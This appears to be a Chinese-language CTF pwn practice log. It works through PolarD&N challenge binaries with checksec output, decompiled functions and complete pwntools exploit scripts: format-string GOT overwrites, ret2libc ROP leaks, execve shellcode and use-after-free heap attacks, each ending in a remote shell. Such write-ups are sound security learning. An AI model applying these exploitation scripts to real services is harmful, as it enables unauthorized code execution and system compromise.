io.sendlineafter('question:\n' , payload) io.interactive()
格式化字符串劫持got 日常检查一下
1 2 3 4 5 6 7 8 bq@ubuntu:~$ checksec pwn1 [*] '/home/bbq/pwn1' Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~$
ida打开看一下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 int come_on () { char buf[64 ]; unsigned int v2; v2 = __readgsdword(0x14u ); system ("echo hhh~" ); read (0 , buf, 0x50u ); printf (buf); puts ("echo you are good" ); puts ("echo hh,the shell give you" ); printf ("/bin/sh" ); return 0 ; }
看着还是比较基础的
思路:第一个泄露地址,然后got改写
这种先找一下偏移
知道偏移为7
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./pwn1' ) p=remote('1.95.36.136' , 2056 ) printf_got=elf.got['printf' ] system_plt=elf.plt['system' ] system_addr=0x8048490 payload = fmtstr_payload(7 ,{printf_got:system_addr}) sla('hhh~' ,payload) inter()
2024.11.14
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec 1111 [*] '/home/bbq/1111' Arch: i386-32 -little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000 ) bbq@ubuntu:~$
ida打开就是一个格式化字符串加一个ROP链
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./1111' ) p=remote('1.95.36.136' , 2124 ) rl('name\n' ) payload=p32(0x804A030 )+b'aaaa' +b"%4$n" s(payload) rl('secret:' ) payload1 = b"A" *(0x108 +4 )+ p32(elf.plt['puts' ]) + p32(elf.sym['vuln' ]) + p32(elf.got['puts' ]) sl(payload1) puts_addr=get_addr32() pr(hex (puts_addr)) ''' libc_base=puts_addr-libc.sym['puts'] pr(hex(libc_base)) system_addr,bin_sh= get_sb() ''' libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) payload3 = flat([b'A' *(0x108 +4 ),system_addr,b'aaaa' ,bin_sh]) p.sendline(payload3) inter()
来东北看雪 2024.11.14
1 2 3 4 5 6 7 8 9 10 int fun () { char s[108 ]; printf ("Do you like Northeast China ???" ); read (0 , &buf2, 0x32u ); puts ("Are you coming to Northeast to see the snow ?!!!" ); gets (s); return 0 ; }
看着像shellcode
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 from pwn import *context(log_level= 'debug' , arch = 'i386' , os = 'linux' ) p=process('./1111' ) p=remote('120.46.59.242' , 2101 ) str_addr=0x804A080 p.recvuntil('Please Input:\n' ) shellcode=asm(shellcraft.sh()) p.sendline(shellcode) p.recvuntil('What,s your name ?:\n' ) payload=b'a' *(0x68 +4 )+p32(str_addr) p.sendline(payload) p.interactive()
cardlibc 2024.11.14
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec cardlibc [*] '/home/bbq/cardlibc' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
没啥意思了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./cardlibc' ) p=remote('1.95.36.136' , 2084 ) pop_rdi=0x0000000000400753 ret_addr=0x0000000000400509 payload=b'a' *(0x70 +8 )+p64(pop_rdi)+p64(elf.got['puts' ])+p64(elf.plt['puts' ])+p64(elf.sym['main' ]) sl(payload) puts_addr=get_addr64() pr(hex (puts_addr)) ''' libc_base=puts_addr-libc.sym['puts'] pr(hex(libc_base)) system_addr,bin_sh=get_sb() ''' libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) pr(hex (libc_base)) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) payload2= flat([b'a' *(0x70 +8 ),ret_addr,pop_rdi,bin_sh,system_addr]) sl(payload2) inter()
中间有个整数溢出
shellcode1-未做出 2024.11.16
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~$ checksec shellcode1 [*] '/home/bbq/shellcode1' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x8048000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~$
ida里面看看
shellcode没啥说的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 from pwn import *context(log_level= 'debug' , arch = 'i386' , os = 'linux' ) p=process('./shellcode1' ) p=remote('1.95.36.136' ,2079 ) str_addr=0x804A080 p.recvuntil('name?\n' ) shellcode=asm(shellcraft.sh()) p.send(shellcode) p.recvuntil('to me:\n' ) payload=b'a' *(0x6c +4 )+p32(str_addr) p.sendline(payload) p.interactive()
sys 2024.11.16
后门
1 2 3 4 5 6 7 8 from pwn import *p = remote('1.95.36.136' , 2064 ) pay=b'a' *(0x28 +4 )+p32(0x80488D2 ) p.send(pay) p.interactive()
巴啦啦亮吗-为做出 2024.11.16
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec pwn1 [*] '/home/bbq/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x3fe000) bbq@ubuntu:~$
ida打开
sys504505 2024.11.18
日常检查一下
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec sys504505 [*] '/home/bbq/sys504505' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled bbq@ubuntu:~$
全开,ida打开
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 __int64 __fastcall main (int a1, char **a2, char **a3) { int i; int j; char *v6; char *k; *command = 3242 ; dword_201064 = 3020 ; dword_201068 = 3771 ; dword_20106C += 3242 ; dword_201070 = 1454 ; LODWORD (__libc_start_main) = 134513952 ; puts ("Welcome to PolarD&N CTF!" ); for ( i = 0 ; i <= 19 ; ++i ) { _isoc99_scanf("%d" , &command[4 * i]); *&command[4 * i] += 504505 ; } for ( j = 20 ; j <= 39 ; ++j ) *&command[4 * j] += 504505 ; v6 = command; for ( k = aPolardNCtfElen; *v6 && *k && *v6 == *k; ++k ) ++v6; if ( *k ) exit (1 ); puts ("You are so intelligent!!!" ); system (command); return 0LL ; }
打开也是看见了system函数,猜测就是要构造/bin/sh
但是这个command是我们要自己输入得到的
大概就两步
for循环构造/bin/sh
if绕过退出
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 from pwn import *p = remote('1.95.36.136' , 2061 ) elf = ELF('./sys504505' ) flag = b"PolarD&N CTF ELENVE Win!;/bin/sh\0" payload = b'' buf = b'' cnt = 0 for pat in flag: buf += bytes ([pat]) if len (buf) == 4 : cnt += 1 p.sendline(bytes (str (u32(buf) - 504505 ), encoding = 'utf-8' )) print (buf) print (u32(buf)-504505 ) buf = b'' while len (buf) < 4 : buf += b'\0' print (buf)p.sendline(bytes (str (u32(buf) - 504505 ), encoding = 'utf-8' )) print (u32(buf) - 504505 )while cnt < 20 : print (0 ) p.sendline(bytes (str (0 - 504505 ), encoding = 'utf-8' )) cnt += 1 p.interactive()
friend-找不到libc版本 栈题能做
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec friend [*] '/home/bbq/friend' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~$
丢进ida里面看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 int Start () { char buf[100 ]; int v2[3 ]; v2[0 ] = 0 ; begin (); puts ("Please enter what you need:" ); __isoc99_scanf("%d" , v2); if ( v2[0 ] == 1 ) { puts ("heihei~" ); } else if ( v2[0 ] == 2 ) { write (1 , "Give You Ret2libc\n" , 0x12u ); return read (0 , buf, 0x100u ); } return puts ("ByeBye!" ); }
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./friend' ) p=remote('1.95.36.136' , 2124 ) sla('you need:\n' ,b'2' ) puts_plt = elf.plt['write' ] puts_got = elf.got['write' ] main_addr = elf.symbols['main' ] payload = b"A" *(0x70 +4 )+ p32(puts_plt) + p32(main_addr) +p32(1 )+p32(puts_got)+p32(4 ) rl('Ret2libc\n' ) p.send(payload) write_addr=get_addr32() pr(hex (write_addr)) libc = LibcSearcher("write" ,write_addr) libc_base = write_addr - libc.dump("write" ) pr(hex (libc_base)) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) sla('you need:\n' ,b'2' ) payload = flat([b'A' *(0x70 +4 ),system_addr,b'AAAA' ,bin_sh]) sla('Ret2libc\n' ,payload) inter()
就这样吧
like_it 怎么说呢是道堆题
早做晚做都得做,而且现在也不早了
还是那个问题
堆题还有必要看保护机制吗?
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec like_it [*] '/home/bbq/like_it' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~$
因为没开地址随机化的问题
我们是可以利用这个后门的应该是
我们看一眼主函数
确实看上去还是比较熟悉的堆题的模板
然后呢
函数开始之前有个def函数
我还以为要有个绕过呢!
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 unsigned __int64 def () { const char *s1; char buf[104 ]; unsigned __int64 v3; v3 = __readfsqword(0x28u ); puts ("Hi! What do you like?" ); read (0 , buf, 0x64uLL ); if ( strtok (buf, "," ) ) { s1 = strtok (0LL , "." ); if ( s1 ) { if ( strcmp (s1, "everyone" ) && ptrace (PTRACE_TRACEME) == -1 ) exit (2 ); } else if ( ptrace (PTRACE_TRACEME) == -1 ) { exit (2 ); } } else if ( ptrace (PTRACE_TRACEME) == -1 ) { exit (2 ); } return __readfsqword(0x28u ) ^ v3; }
但是我发现最后输入什么都可以绕过,so暂时不管他
找一下堆题的漏洞
感觉就是UAF漏洞哈
SO正常申请堆块后释放就行了是吧
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./like_it' ) p=remote('1.95.36.136' , 2058 ) def Add (Size, Context ): p.recvuntil(':' ) p.sendline('1' ) p.recvuntil(':' ) p.sendline(str (Size)) p.recvuntil(':' ) p.sendline(Context) def Del (Index ): p.recvuntil(':' ) p.sendline('2' ) p.recvuntil(':' ) p.sendline(str (Index)) def Show (Index ): p.recvuntil(':' ) p.sendline('3' ) p.recvuntil(':' ) p.sendline(str (Index)) magic_addr=0x000000000400CB1 sa('like?\n' ,b'aaa' ) Add(0x14 , 'polar_ctf' ) Add(0x19 , 'polar_ctf_2023' ) Del(0 ) Del(1 ) Add(6 , p64(magic_addr)) Show(0 ) inter()
easychunk-未做出 日常检查
fate 2024.11.18
日常检查
1 2 3 4 5 6 7 8 bbq@ubuntu:~$ checksec fate [*] '/home/bbq/fate' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x8048000) bbq@ubuntu:~$
后门
1 2 3 4 5 6 7 8 from pwn import *p = remote('1.95.36.136' , 2058 ) pay=b'a' *(0x6c +4 )+p32(0x804887C ) p.sendline(pay) p.interactive()
look 没啥说的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 from pwn import *from LibcSearcher import *context.log_level = 'debug' context.arch = 'i386' context.os='linux' elf = ELF('./look' ) p=remote('1.95.36.136' , 2095 ) write_plt = elf.plt['write' ] write_got = elf.got['write' ] main_addr =0x8048561 payload1 = b"A" *(0x6c +4 )+ p32(write_plt) + p32(main_addr) +p32(1 )+ p32(write_got)+p32(4 ) p.send(payload1) write_addr = u32(p.recv(4 )) print (hex (write_addr))''' #构建一下libc libc = LibcSearcher("write",write_addr) libc_base = write_addr - libc.dump("write") system_addr = libc_base+libc.dump("system") bin_sh = libc_base+libc.dump("str_bin_sh") #attack2 # p.sendline(payload) p.recvuntil('Correct\n') payload2 = flat([b'A'*(0xe7+4),system_addr,main_addr,bin_sh]) p.sendline(payload2) ''' p.interactive()
worker 先日常检查一下
1 2 3 4 5 6 7 8 bbq@ubuntu:~/tools/LibcSearcher$ checksec worker [*] '/home/bbq/tools/LibcSearcher/worker' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~/tools/LibcSearcher
看着像是堆题
但是ida看一眼
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 void __fastcall __noreturn main (__int64 a1, char **a2, char **a3) { int v3; char buf[8 ]; unsigned __int64 v5; v5 = __readfsqword(0x28u ); init_0 (); while ( 1 ) { while ( 1 ) { menu (); read (0 , buf, 8uLL ); v3 = atoi (buf); if ( v3 != 3 ) break ; del (); } if ( v3 > 3 ) { if ( v3 == 4 ) exit (0 ); if ( v3 == 1285 ) { if ( qword_6020C0 <= 1284 ) { puts ("Bad!" ); } else { puts ("Congratulate!" ); shell (); } } else { LABEL_17: puts ("Invalid Choice" ); } } else if ( v3 == 1 ) { make (); } else { if ( v3 != 2 ) goto LABEL_17; edit (); } } }
但是有个shell,也不知道是假的还是作为一个后门
既然是堆题看看能不能先找到漏洞再说
ezUAF 既然给出了漏洞,那就直接看
模板题型啥也不说了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) libc=ELF('/lib/x86_64-linux-gnu/libc.so.6' ) elf=ELF('./ezUAF' ) p=remote('1.95.36.136' , 2080 ) def Add (Size, Context ): p.recvuntil(':' ) p.sendline('1' ) p.recvuntil(':' ) p.sendline(str (Size)) p.recvuntil(':' ) p.sendline(Context) def Del (Index ): p.recvuntil(':' ) p.sendline('2' ) p.recvuntil(':' ) p.sendline(str (Index)) def Show (Index ): p.recvuntil(':' ) p.sendline('3' ) p.recvuntil(':' ) p.sendline(str (Index)) magic_addr=0x8048945 Add(0x14 , 'polar_ctf' ) Add(0x19 , 'polar_ctf_2023' ) Del(0 ) Del(1 ) Add(6 , p64(magic_addr)) Show(0 ) inter()
ezuaf 1 2 3 4 5 6 7 8 bbq@ubuntu:~/tools/LibcSearcher$ checksec ezuaf [*] '/home/bbq/tools/LibcSearcher/ezuaf' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) bbq@ubuntu:~/tools/LibcSearcher$
看着开了随机化,应该是有后门的吧
结果不是我想的UAF函数
ida打开看看
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 int __fastcall __noreturn main (int argc, const char **argv, const char **envp) { int v3; int v4; unsigned __int64 v5; v5 = __readfsqword(0x28u ); Polar_init (); while ( 1 ) { mulu (); __isoc99_scanf("%d" , &v3); switch ( v3 ) { case 2 : puts ("[+] Input Size : " ); __isoc99_scanf("%d" , &v4); heap = my_malloc (v4); break ; case 3 : my_print_heap (); break ; case 1 : puts ("[+] Input FileName : " ); __isoc99_scanf("%s" , fileInfo); dword_6020E8 = read_file (fileInfo); puts ("[+] Success!" ); break ; } } }
看一下菜单
1 2 3 4 5 6 int mulu () { puts ("[+] 1.Read" ); puts ("[+] 2.Malloc" ); return puts ("[+] 3.Print" ); }
一读取、二申请堆块、三打印堆块
在read里面我们也是看见了UAF函数
然后我们就可以继续利用这个漏洞了
EXP:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) elf=ELF('./ezuaf' ) p = process('./ezuaf' ) sla('Print\n' ,b'1' ) attach(p,'b *0x0000000004009CD' ) pause() sla('FileName :' ,b'flag' ) inter()
怎么说呢看一眼wp。看看malloc之前的堆块长什么样。看看申请之后是什么样
申请后
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 from pwn import *from struct import packimport ctypesdef bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='amd64' ,log_level='debug' ) elf=ELF('./ezuaf' ) p = process('./ezuaf' ) sla('Print\n' ,b'1' ) sla('FileName :' ,b'flag' ) sla('Print\n' ,b'2' ) sla('Size :' ,b'30' ) sla('Print\n' ,b'3' ) str = u64(p.recv(8 ))pr(hex (str ) ) sla('Print\n' ,b'2' ) sla('Size :' ,b'543' ) sla('Print\n' ,b'3' ) inter()
music 没啥说的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 from pwn import *from struct import packimport ctypesfrom LibcSearcher import *def bug (): gdb.attach(p) pause() def s (a ): p.send(a) def sa (a,b ): p.sendafter(a,b) def sl (a ): p.sendline(a) def sla (a,b ): p.sendlineafter(a,b) def r (a ): p.recv(a) def rl (a ): return p.recvuntil(a) def inter (): p.interactive() def get_addr64 (): return u64(p.recvuntil("\x7f" )[-6 :].ljust(8 ,b'\x00' )) def get_addr32 (): return u32(p.recvuntil("\xf7" )[-4 :]) def get_sb (): return libc_base+libc.sym['system' ],libc_base+libc.search(b"/bin/sh\x00" ).__next__() def get_hook (): return libc_base+libc.sym['__malloc_hook' ],libc_base+libc.sym['__free_hook' ] pr = lambda x : print ('\x1b[01;38;5;214m' + x + '\x1b[0m' ) ll = lambda x : print ('\x1b[01;38;5;1m' + x + '\x1b[0m' ) context(os='linux' ,arch='i386' ,log_level='debug' ) elf=ELF('./music' ) p=remote('1.95.36.136' , 2140 ) sla('to music?\n' ,b'yes' ) sla('of music?\n' ,b'pop' ) puts_plt = elf.plt['puts' ] puts_got = elf.got['puts' ] main_addr = elf.symbols['main' ] payload = b"A" *(0x3a +4 )+ p32(puts_plt) + p32(main_addr) +p32(puts_got) rl('as you!\n' ) p.sendline(payload) puts_addr=get_addr32() pr(hex (puts_addr)) libc = LibcSearcher("puts" ,puts_addr) libc_base = puts_addr - libc.dump("puts" ) pr(hex (libc_base)) system_addr = libc_base+libc.dump("system" ) bin_sh = libc_base+libc.dump("str_bin_sh" ) sla('to music?\n' ,b'yes' ) sla('of music?\n' ,b'pop' ) rl('as you!\n' ) payload = flat([b'A' *(0x3a +4 ),system_addr,b'AAAA' ,bin_sh]) sl(payload) inter()
txxxt 后门啥也不说了
1 2 3 4 5 6 7 8 from pwn import *p = remote('1.95.36.136' , 2147 ) pay=b'a' *(0x9 +4 )+p32(0x804859B ) p.sendline(pay) p.interactive()
shellcode分割 既然说是shellcode了
那就写shellcode喽
1 2 3 4 5 6 7 8 9 10 bbq@ubuntu:~/tools/LibcSearcher$ checksec 1111 [*] '/home/bbq/tools/LibcSearcher/1111' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX unknown - GNU_STACK missing PIE: No PIE (0x400000) Stack: Executable RWX: Has RWX segments bbq@ubuntu:~/tools/LibcSearcher$
这里没有特别好的思路直接看wp了
这里直接贴EXP了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 from pwn import *io=remote('1.95.36.136' , 2145 ) context(os='linux' ,arch='amd64' ,log_level='debug' ) shell1 = 0x0000000000404090 shell2 = 0x00000000004040A0 shell_addr = 0x4011F4 main_addr = 0x4013c3 yichu_addr = 0x40139a io.recv() payload = b'a' * 16 + p64(shell_addr) io.send(payload) io.recvuntil(b"please : " ) io.sendline(b'1' ) payload1 = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f' io.sendline(payload1) io.recvuntil(b"please : " ) io.sendline(b'2' ) payload2 = b'\x6a\x3b\x58\x31\xd2\x0f\x05' io.sendline(payload2) io.recvuntil(b"please : " ) io.sendline(b"4" ) payload = b'a' * (0x28 ) + p64(shell1) io.send(payload) io.recvuntil(b"please : " ) io.sendline(b"3" ) io.interactive()
这里其实不用直接返回main函数,直接返回到shellcode函数地址就行了
本地没打通先放着看看
find 后门没啥说的
1 2 3 4 5 6 7 8 from pwn import *p = remote('1.95.36.136' , 2098 ) p.sendlineafter('need:\n' ,b'2' ) pay=b'a' *(0x70 +4 )+p32(0x80485F1 ) p.sendline(pay) p.interactive()
travel 格式化字符串-基本题型
偏移为6
1 2 3 4 5 6 7 8 9 from pwn import *p=remote('1.95.36.136' , 2094 ) payload=p32(0x804A030 )+b"%6$n" p.send(payload) p.interactive()
heap_Double_Free-未做出 2024.11.20
既然给了漏洞就简单看一下
